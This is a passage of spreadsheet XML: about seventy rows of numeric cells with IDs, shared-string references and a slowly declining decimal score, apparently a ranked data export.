    </row>
    <row r="29893" ht="15.75" customHeight="1">
      <c r="A29893" s="1">
        <v>28981.0</v>
      </c>
      <c r="B29893" s="2">
        <v>2.982126E7</v>
      </c>
      <c r="C29893" s="2" t="s">
        <v>28736</v>
      </c>
      <c r="D29893" s="2">
        <v>1.0</v>
      </c>
      <c r="E29893" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29893" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29894" ht="15.75" customHeight="1">
      <c r="A29894" s="1">
        <v>4820.0</v>
      </c>
      <c r="B29894" s="2">
        <v>4.3611854E7</v>
      </c>
      <c r="C29894" s="2" t="s">
        <v>28737</v>
      </c>
      <c r="D29894" s="2">
        <v>1.0</v>
      </c>
      <c r="E29894" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29894" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="29895" ht="15.75" customHeight="1">
      <c r="A29895" s="1">
        <v>28443.0</v>
      </c>
      <c r="B29895" s="2">
        <v>2.6516652E7</v>
      </c>
      <c r="C29895" s="2" t="s">
        <v>28738</v>
      </c>
      <c r="D29895" s="2">
        <v>1.0</v>
      </c>
      <c r="E29895" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29895" s="2">
        <v>0.1403903903903904</v>
      </c>
    </row>
    <row r="29896" ht="15.75" customHeight="1">
      <c r="A29896" s="1">
        <v>11437.0</v>
      </c>
      <c r="B29896" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C29896" s="2" t="s">
        <v>28739</v>
      </c>
      <c r="D29896" s="2">
        <v>1.0</v>
      </c>
      <c r="E29896" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29896" s="2">
        <v>0.1401326699834163</v>
      </c>
    </row>
    <row r="29897" ht="15.75" customHeight="1">
      <c r="A29897" s="1">
        <v>22938.0</v>
      </c>
      <c r="B29897" s="2">
        <v>4.8820735E7</v>
      </c>
      <c r="C29897" s="2" t="s">
        <v>28740</v>
      </c>
      <c r="D29897" s="2">
        <v>1.0</v>
      </c>
      <c r="E29897" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29897" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="29898" ht="15.75" customHeight="1">
      <c r="A29898" s="1">
        <v>13448.0</v>
      </c>
      <c r="B29898" s="2">
        <v>3.5171284E7</v>
      </c>
      <c r="C29898" s="2" t="s">
        <v>28741</v>
      </c>
      <c r="D29898" s="2">
        <v>1.0</v>
      </c>
      <c r="E29898" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29898" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="29899" ht="15.75" customHeight="1">
      <c r="A29899" s="1">
        <v>211.0</v>
      </c>
      <c r="B29899" s="2">
        <v>1.4569559E7</v>
      </c>
      <c r="C29899" s="2" t="s">
        <v>28742</v>
      </c>
      <c r="D29899" s="2">
        <v>1.0</v>
      </c>
      <c r="E29899" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29899" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="29900" ht="15.75" customHeight="1">
      <c r="A29900" s="1">
        <v>18686.0</v>
      </c>
      <c r="B29900" s="2">
        <v>5.3592645E7</v>
      </c>
      <c r="C29900" s="2" t="s">
        <v>28743</v>
      </c>
      <c r="D29900" s="2">
        <v>1.0</v>
      </c>
      <c r="E29900" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29900" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="29901" ht="15.75" customHeight="1">
      <c r="A29901" s="1">
        <v>3100.0</v>
      </c>
      <c r="B29901" s="2">
        <v>3.6699831E7</v>
      </c>
      <c r="C29901" s="2" t="s">
        <v>28744</v>
      </c>
      <c r="D29901" s="2">
        <v>1.0</v>
      </c>
      <c r="E29901" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29901" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="29902" ht="15.75" customHeight="1">
      <c r="A29902" s="1">
        <v>3785.0</v>
      </c>
      <c r="B29902" s="2">
        <v>3.9919894E7</v>
      </c>
      <c r="C29902" s="2" t="s">
        <v>28745</v>
      </c>
      <c r="D29902" s="2">
        <v>1.0</v>
      </c>
      <c r="E29902" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29902" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="29903" ht="15.75" customHeight="1">
      <c r="A29903" s="1">
        <v>25379.0</v>
      </c>
      <c r="B29903" s="2">
        <v>1.3655174E7</v>
      </c>
      <c r="C29903" s="2" t="s">
        <v>28746</v>
      </c>
      <c r="D29903" s="2">
        <v>1.0</v>
      </c>
      <c r="E29903" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29903" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="29904" ht="15.75" customHeight="1">
      <c r="A29904" s="1">
        <v>16698.0</v>
      </c>
      <c r="B29904" s="2">
        <v>4.7387187E7</v>
      </c>
      <c r="C29904" s="2" t="s">
        <v>28747</v>
      </c>
      <c r="D29904" s="2">
        <v>1.0</v>
      </c>
      <c r="E29904" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29904" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="29905" ht="15.75" customHeight="1">
      <c r="A29905" s="1">
        <v>3972.0</v>
      </c>
      <c r="B29905" s="2">
        <v>4.0783856E7</v>
      </c>
      <c r="C29905" s="2" t="s">
        <v>28748</v>
      </c>
      <c r="D29905" s="2">
        <v>1.0</v>
      </c>
      <c r="E29905" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29905" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="29906" ht="15.75" customHeight="1">
      <c r="A29906" s="1">
        <v>14586.0</v>
      </c>
      <c r="B29906" s="2">
        <v>4.0149131E7</v>
      </c>
      <c r="C29906" s="2" t="s">
        <v>28749</v>
      </c>
      <c r="D29906" s="2">
        <v>1.0</v>
      </c>
      <c r="E29906" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29906" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="29907" ht="15.75" customHeight="1">
      <c r="A29907" s="1">
        <v>20586.0</v>
      </c>
      <c r="B29907" s="2">
        <v>1.3748839E7</v>
      </c>
      <c r="C29907" s="2" t="s">
        <v>28750</v>
      </c>
      <c r="D29907" s="2">
        <v>1.0</v>
      </c>
      <c r="E29907" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29907" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="29908" ht="15.75" customHeight="1">
      <c r="A29908" s="1">
        <v>23297.0</v>
      </c>
      <c r="B29908" s="2">
        <v>5399869.0</v>
      </c>
      <c r="C29908" s="2" t="s">
        <v>28751</v>
      </c>
      <c r="D29908" s="2">
        <v>1.0</v>
      </c>
      <c r="E29908" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29908" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="29909" ht="15.75" customHeight="1">
      <c r="A29909" s="1">
        <v>28198.0</v>
      </c>
      <c r="B29909" s="2">
        <v>2.501588E7</v>
      </c>
      <c r="C29909" s="2" t="s">
        <v>28752</v>
      </c>
      <c r="D29909" s="2">
        <v>1.0</v>
      </c>
      <c r="E29909" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29909" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="29910" ht="15.75" customHeight="1">
      <c r="A29910" s="1">
        <v>31960.0</v>
      </c>
      <c r="B29910" s="2">
        <v>5310903.0</v>
      </c>
      <c r="C29910" s="2" t="s">
        <v>28753</v>
      </c>
      <c r="D29910" s="2">
        <v>1.0</v>
      </c>
      <c r="E29910" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29910" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="29911" ht="15.75" customHeight="1">
      <c r="A29911" s="1">
        <v>8568.0</v>
      </c>
      <c r="B29911" s="2">
        <v>5.4185168E7</v>
      </c>
      <c r="C29911" s="2" t="s">
        <v>28754</v>
      </c>
      <c r="D29911" s="2">
        <v>1.0</v>
      </c>
      <c r="E29911" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29911" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="29912" ht="15.75" customHeight="1">
      <c r="A29912" s="1">
        <v>13281.0</v>
      </c>
      <c r="B29912" s="2">
        <v>3.4405075E7</v>
      </c>
      <c r="C29912" s="2" t="s">
        <v>28755</v>
      </c>
      <c r="D29912" s="2">
        <v>1.0</v>
      </c>
      <c r="E29912" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29912" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="29913" ht="15.75" customHeight="1">
      <c r="A29913" s="1">
        <v>15285.0</v>
      </c>
      <c r="B29913" s="2">
        <v>4.2418983E7</v>
      </c>
      <c r="C29913" s="2" t="s">
        <v>28756</v>
      </c>
      <c r="D29913" s="2">
        <v>1.0</v>
      </c>
      <c r="E29913" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29913" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="29914" ht="15.75" customHeight="1">
      <c r="A29914" s="1">
        <v>17731.0</v>
      </c>
      <c r="B29914" s="2">
        <v>5.0671556E7</v>
      </c>
      <c r="C29914" s="2" t="s">
        <v>28757</v>
      </c>
      <c r="D29914" s="2">
        <v>1.0</v>
      </c>
      <c r="E29914" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29914" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="29915" ht="15.75" customHeight="1">
      <c r="A29915" s="1">
        <v>3767.0</v>
      </c>
      <c r="B29915" s="2">
        <v>3.9823658E7</v>
      </c>
      <c r="C29915" s="2" t="s">
        <v>28758</v>
      </c>
      <c r="D29915" s="2">
        <v>1.0</v>
      </c>
      <c r="E29915" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29915" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29916" ht="15.75" customHeight="1">
      <c r="A29916" s="1">
        <v>3833.0</v>
      </c>
      <c r="B29916" s="2">
        <v>4.017983E7</v>
      </c>
      <c r="C29916" s="2" t="s">
        <v>28759</v>
      </c>
      <c r="D29916" s="2">
        <v>1.0</v>
      </c>
      <c r="E29916" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29916" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29917" ht="15.75" customHeight="1">
      <c r="A29917" s="1">
        <v>14087.0</v>
      </c>
      <c r="B29917" s="2">
        <v>3.7709537E7</v>
      </c>
      <c r="C29917" s="2" t="s">
        <v>28760</v>
      </c>
      <c r="D29917" s="2">
        <v>1.0</v>
      </c>
      <c r="E29917" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29917" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29918" ht="15.75" customHeight="1">
      <c r="A29918" s="1">
        <v>16309.0</v>
      </c>
      <c r="B29918" s="2">
        <v>4.5939828E7</v>
      </c>
      <c r="C29918" s="2" t="s">
        <v>28761</v>
      </c>
      <c r="D29918" s="2">
        <v>1.0</v>
      </c>
      <c r="E29918" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29918" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29919" ht="15.75" customHeight="1">
      <c r="A29919" s="1">
        <v>16847.0</v>
      </c>
      <c r="B29919" s="2">
        <v>4.7910053E7</v>
      </c>
      <c r="C29919" s="2" t="s">
        <v>28762</v>
      </c>
      <c r="D29919" s="2">
        <v>1.0</v>
      </c>
      <c r="E29919" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29919" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29920" ht="15.75" customHeight="1">
      <c r="A29920" s="1">
        <v>20020.0</v>
      </c>
      <c r="B29920" s="2">
        <v>6070835.0</v>
      </c>
      <c r="C29920" s="2" t="s">
        <v>28763</v>
      </c>
      <c r="D29920" s="2">
        <v>1.0</v>
      </c>
      <c r="E29920" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29920" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29921" ht="15.75" customHeight="1">
      <c r="A29921" s="1">
        <v>22372.0</v>
      </c>
      <c r="B29921" s="2">
        <v>3.5006536E7</v>
      </c>
      <c r="C29921" s="2" t="s">
        <v>28764</v>
      </c>
      <c r="D29921" s="2">
        <v>1.0</v>
      </c>
      <c r="E29921" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29921" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29922" ht="15.75" customHeight="1">
      <c r="A29922" s="1">
        <v>23244.0</v>
      </c>
      <c r="B29922" s="2">
        <v>5.3029447E7</v>
      </c>
      <c r="C29922" s="2" t="s">
        <v>28765</v>
      </c>
      <c r="D29922" s="2">
        <v>1.0</v>
      </c>
      <c r="E29922" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29922" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29923" ht="15.75" customHeight="1">
      <c r="A29923" s="1">
        <v>25129.0</v>
      </c>
      <c r="B29923" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C29923" s="2" t="s">
        <v>28766</v>
      </c>
      <c r="D29923" s="2">
        <v>1.0</v>
      </c>
      <c r="E29923" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29923" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29924" ht="15.75" customHeight="1">
      <c r="A29924" s="1">
        <v>27143.0</v>
      </c>
      <c r="B29924" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C29924" s="2" t="s">
        <v>28767</v>
      </c>
      <c r="D29924" s="2">
        <v>1.0</v>
      </c>
      <c r="E29924" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29924" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29925" ht="15.75" customHeight="1">
      <c r="A29925" s="1">
        <v>31328.0</v>
      </c>
      <c r="B29925" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C29925" s="2" t="s">
        <v>28768</v>
      </c>
      <c r="D29925" s="2">
        <v>1.0</v>
      </c>
      <c r="E29925" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29925" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29926" ht="15.75" customHeight="1">
      <c r="A29926" s="1">
        <v>31407.0</v>
      </c>
      <c r="B29926" s="2">
        <v>5.0058195E7</v>
      </c>
      <c r="C29926" s="2" t="s">
        <v>28769</v>
      </c>
      <c r="D29926" s="2">
        <v>1.0</v>
      </c>
      <c r="E29926" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29926" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29927" ht="15.75" customHeight="1">
      <c r="A29927" s="1">
        <v>31915.0</v>
      </c>
      <c r="B29927" s="2">
        <v>5.3029446E7</v>
      </c>
      <c r="C29927" s="2" t="s">
        <v>28765</v>
      </c>
      <c r="D29927" s="2">
        <v>1.0</v>
      </c>
      <c r="E29927" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29927" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="29928" ht="15.75" customHeight="1">
      <c r="A29928" s="1">
        <v>1821.0</v>
      </c>
      <c r="B29928" s="2">
        <v>2.9273935E7</v>
      </c>
      <c r="C29928" s="2" t="s">
        <v>28770</v>
      </c>
      <c r="D29928" s="2">
        <v>1.0</v>
      </c>
      <c r="E29928" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29928" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="29929" ht="15.75" customHeight="1">
      <c r="A29929" s="1">
        <v>20010.0</v>
      </c>
      <c r="B29929" s="2">
        <v>5.7738276E7</v>
      </c>
      <c r="C29929" s="2" t="s">
        <v>28771</v>
      </c>
      <c r="D29929" s="2">
        <v>1.0</v>
      </c>
      <c r="E29929" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29929" s="2">
        <v>0.1380718954248366</v>
      </c>
    </row>
    <row r="29930" ht="15.75" customHeight="1">
      <c r="A29930" s="1">
        <v>12282.0</v>
      </c>
      <c r="B29930" s="2">
        <v>2.816237E7</v>
      </c>
      <c r="C29930" s="2" t="s">
        <v>28772</v>
      </c>
      <c r="D29930" s="2">
        <v>1.0</v>
      </c>
      <c r="E29930" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29930" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="29931" ht="15.75" customHeight="1">
      <c r="A29931" s="1">
        <v>28139.0</v>
      </c>
      <c r="B29931" s="2">
        <v>2.4797765E7</v>
      </c>
      <c r="C29931" s="2" t="s">
        <v>28773</v>
      </c>
      <c r="D29931" s="2">
        <v>1.0</v>
      </c>
      <c r="E29931" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29931" s="2">
        <v>0.1375968992248062</v>
      </c>
    </row>
    <row r="29932" ht="15.75" customHeight="1">
      <c r="A29932" s="1">
        <v>16378.0</v>
      </c>
      <c r="B29932" s="2">
        <v>4.6187655E7</v>
      </c>
      <c r="C29932" s="2" t="s">
        <v>28774</v>
      </c>
      <c r="D29932" s="2">
        <v>1.0</v>
      </c>
      <c r="E29932" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29932" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="29933" ht="15.75" customHeight="1">
      <c r="A29933" s="1">
        <v>7727.0</v>
      </c>
      <c r="B29933" s="2">
        <v>5.202482E7</v>
      </c>
      <c r="C29933" s="2" t="s">
        <v>28775</v>
      </c>
      <c r="D29933" s="2">
        <v>1.0</v>
      </c>
      <c r="E29933" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29933" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="29934" ht="15.75" customHeight="1">
      <c r="A29934" s="1">
        <v>22425.0</v>
      </c>
      <c r="B29934" s="2">
        <v>3.613713E7</v>
      </c>
      <c r="C29934" s="2" t="s">
        <v>28776</v>
      </c>
      <c r="D29934" s="2">
        <v>1.0</v>
      </c>
      <c r="E29934" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29934" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="29935" ht="15.75" customHeight="1">
      <c r="A29935" s="1">
        <v>27350.0</v>
      </c>
      <c r="B29935" s="2">
        <v>2.1486691E7</v>
      </c>
      <c r="C29935" s="2" t="s">
        <v>28777</v>
      </c>
      <c r="D29935" s="2">
        <v>1.0</v>
      </c>
      <c r="E29935" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29935" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="29936" ht="15.75" customHeight="1">
      <c r="A29936" s="1">
        <v>13684.0</v>
      </c>
      <c r="B29936" s="2">
        <v>3.6089224E7</v>
      </c>
      <c r="C29936" s="2" t="s">
        <v>28778</v>
      </c>
      <c r="D29936" s="2">
        <v>1.0</v>
      </c>
      <c r="E29936" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29936" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="29937" ht="15.75" customHeight="1">
      <c r="A29937" s="1">
        <v>25877.0</v>
      </c>
      <c r="B29937" s="2">
        <v>1.4954164E7</v>
      </c>
      <c r="C29937" s="2" t="s">
        <v>28779</v>
      </c>
      <c r="D29937" s="2">
        <v>1.0</v>
      </c>
      <c r="E29937" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29937" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="29938" ht="15.75" customHeight="1">
      <c r="A29938" s="1">
        <v>30108.0</v>
      </c>
      <c r="B29938" s="2">
        <v>3.6688506E7</v>
      </c>
      <c r="C29938" s="2" t="s">
        <v>28780</v>
      </c>
      <c r="D29938" s="2">
        <v>1.0</v>
      </c>
      <c r="E29938" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29938" s="2">
        <v>0.1368312757201646</v>
      </c>
    </row>
    <row r="29939" ht="15.75" customHeight="1">
      <c r="A29939" s="1">
        <v>12034.0</v>
      </c>
      <c r="B29939" s="2">
        <v>2.6269619E7</v>
      </c>
      <c r="C29939" s="2" t="s">
        <v>28781</v>
      </c>
      <c r="D29939" s="2">
        <v>1.0</v>
      </c>
      <c r="E29939" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29939" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="29940" ht="15.75" customHeight="1">
      <c r="A29940" s="1">
        <v>13407.0</v>
      </c>
      <c r="B29940" s="2">
        <v>3.500249E7</v>
      </c>
      <c r="C29940" s="2" t="s">
        <v>28782</v>
      </c>
      <c r="D29940" s="2">
        <v>1.0</v>
      </c>
      <c r="E29940" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29940" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="29941" ht="15.75" customHeight="1">
      <c r="A29941" s="1">
        <v>11172.0</v>
      </c>
      <c r="B29941" s="2">
        <v>1.968193E7</v>
      </c>
      <c r="C29941" s="2" t="s">
        <v>28783</v>
      </c>
      <c r="D29941" s="2">
        <v>1.0</v>
      </c>
      <c r="E29941" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29941" s="2">
        <v>0.1364379084967321</v>
      </c>
    </row>
    <row r="29942" ht="15.75" customHeight="1">
      <c r="A29942" s="1">
        <v>13506.0</v>
      </c>
      <c r="B29942" s="2">
        <v>3.5441954E7</v>
      </c>
      <c r="C29942" s="2" t="s">
        <v>28784</v>
      </c>
      <c r="D29942" s="2">
        <v>1.0</v>
      </c>
      <c r="E29942" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29942" s="2">
        <v>0.1362847222222223</v>
      </c>
    </row>
    <row r="29943" ht="15.75" customHeight="1">
      <c r="A29943" s="1">
        <v>7916.0</v>
      </c>
      <c r="B29943" s="2">
        <v>5.2503139E7</v>
      </c>
      <c r="C29943" s="2" t="s">
        <v>28785</v>
      </c>
      <c r="D29943" s="2">
        <v>1.0</v>
      </c>
      <c r="E29943" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29943" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="29944" ht="15.75" customHeight="1">
      <c r="A29944" s="1">
        <v>15716.0</v>
      </c>
      <c r="B29944" s="2">
        <v>4.3974548E7</v>
      </c>
      <c r="C29944" s="2" t="s">
        <v>28786</v>
      </c>
      <c r="D29944" s="2">
        <v>1.0</v>
      </c>
      <c r="E29944" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29944" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="29945" ht="15.75" customHeight="1">
      <c r="A29945" s="1">
        <v>10452.0</v>
      </c>
      <c r="B29945" s="2">
        <v>1.0626375E7</v>
      </c>
      <c r="C29945" s="2" t="s">
        <v>28787</v>
      </c>
      <c r="D29945" s="2">
        <v>1.0</v>
      </c>
      <c r="E29945" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29945" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29946" ht="15.75" customHeight="1">
      <c r="A29946" s="1">
        <v>10762.0</v>
      </c>
      <c r="B29946" s="2">
        <v>1.5591021E7</v>
      </c>
      <c r="C29946" s="2" t="s">
        <v>28788</v>
      </c>
      <c r="D29946" s="2">
        <v>1.0</v>
      </c>
      <c r="E29946" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29946" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29947" ht="15.75" customHeight="1">
      <c r="A29947" s="1">
        <v>12012.0</v>
      </c>
      <c r="B29947" s="2">
        <v>2.6040948E7</v>
      </c>
      <c r="C29947" s="2" t="s">
        <v>28789</v>
      </c>
      <c r="D29947" s="2">
        <v>1.0</v>
      </c>
      <c r="E29947" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29947" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29948" ht="15.75" customHeight="1">
      <c r="A29948" s="1">
        <v>12018.0</v>
      </c>
      <c r="B29948" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C29948" s="2" t="s">
        <v>28790</v>
      </c>
      <c r="D29948" s="2">
        <v>1.0</v>
      </c>
      <c r="E29948" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29948" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29949" ht="15.75" customHeight="1">
      <c r="A29949" s="1">
        <v>17433.0</v>
      </c>
      <c r="B29949" s="2">
        <v>4.9736417E7</v>
      </c>
      <c r="C29949" s="2" t="s">
        <v>28791</v>
      </c>
      <c r="D29949" s="2">
        <v>1.0</v>
      </c>
      <c r="E29949" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29949" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29950" ht="15.75" customHeight="1">
      <c r="A29950" s="1">
        <v>21456.0</v>
      </c>
      <c r="B29950" s="2">
        <v>2.2664765E7</v>
      </c>
      <c r="C29950" s="2" t="s">
        <v>28792</v>
      </c>
      <c r="D29950" s="2">
        <v>1.0</v>
      </c>
      <c r="E29950" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29950" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29951" ht="15.75" customHeight="1">
      <c r="A29951" s="1">
        <v>23095.0</v>
      </c>
      <c r="B29951" s="2">
        <v>5.074787E7</v>
      </c>
      <c r="C29951" s="2" t="s">
        <v>28793</v>
      </c>
      <c r="D29951" s="2">
        <v>1.0</v>
      </c>
      <c r="E29951" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29951" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29952" ht="15.75" customHeight="1">
      <c r="A29952" s="1">
        <v>23770.0</v>
      </c>
      <c r="B29952" s="2">
        <v>7559504.0</v>
      </c>
      <c r="C29952" s="2" t="s">
        <v>28794</v>
      </c>
      <c r="D29952" s="2">
        <v>1.0</v>
      </c>
      <c r="E29952" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29952" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29953" ht="15.75" customHeight="1">
      <c r="A29953" s="1">
        <v>25684.0</v>
      </c>
      <c r="B29953" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C29953" s="2" t="s">
        <v>28795</v>
      </c>
      <c r="D29953" s="2">
        <v>1.0</v>
      </c>
      <c r="E29953" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29953" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29954" ht="15.75" customHeight="1">
      <c r="A29954" s="1">
        <v>30041.0</v>
      </c>
      <c r="B29954" s="2">
        <v>3.6211665E7</v>
      </c>
      <c r="C29954" s="2" t="s">
        <v>28796</v>
      </c>
      <c r="D29954" s="2">
        <v>1.0</v>
      </c>
      <c r="E29954" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29954" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29955" ht="15.75" customHeight="1">
      <c r="A29955" s="1">
        <v>30505.0</v>
      </c>
      <c r="B29955" s="2">
        <v>4.0038826E7</v>
      </c>
      <c r="C29955" s="2" t="s">
        <v>28797</v>
      </c>
      <c r="D29955" s="2">
        <v>1.0</v>
      </c>
      <c r="E29955" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29955" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29956" ht="15.75" customHeight="1">
      <c r="A29956" s="1">
        <v>34072.0</v>
      </c>
      <c r="B29956" s="2">
        <v>9652686.0</v>
      </c>
      <c r="C29956" s="2" t="s">
        <v>28798</v>
      </c>
      <c r="D29956" s="2">
        <v>1.0</v>
      </c>
      <c r="E29956" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29956" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29957" ht="15.75" customHeight="1">
      <c r="A29957" s="1">
        <v>34199.0</v>
      </c>
      <c r="B29957" s="2">
        <v>1.0890308E7</v>
      </c>
      <c r="C29957" s="2" t="s">
        <v>28799</v>
      </c>
      <c r="D29957" s="2">
        <v>1.0</v>
      </c>
      <c r="E29957" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29957" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="29958" ht="15.75" customHeight="1">
      <c r="A29958" s="1">
        <v>23656.0</v>
      </c>
      <c r="B29958" s="2">
        <v>6821280.0</v>
      </c>
      <c r="C29958" s="2" t="s">
        <v>28800</v>
      </c>
      <c r="D29958" s="2">
        <v>1.0</v>
      </c>
      <c r="E29958" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29958" s="2">
        <v>0.1360708534621579</v>
      </c>
    </row>
    <row r="29959" ht="15.75" customHeight="1">
      <c r="A29959" s="1">
        <v>24128.0</v>
      </c>
      <c r="B29959" s="2">
        <v>1.0029421E7</v>
      </c>
      <c r="C29959" s="2" t="s">
        <v>28801</v>
      </c>
      <c r="D29959" s="2">
        <v>1.0</v>
      </c>
      <c r="E29959" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29959" s="2">
        <v>0.1360708534621578</v>
      </c>
    </row>
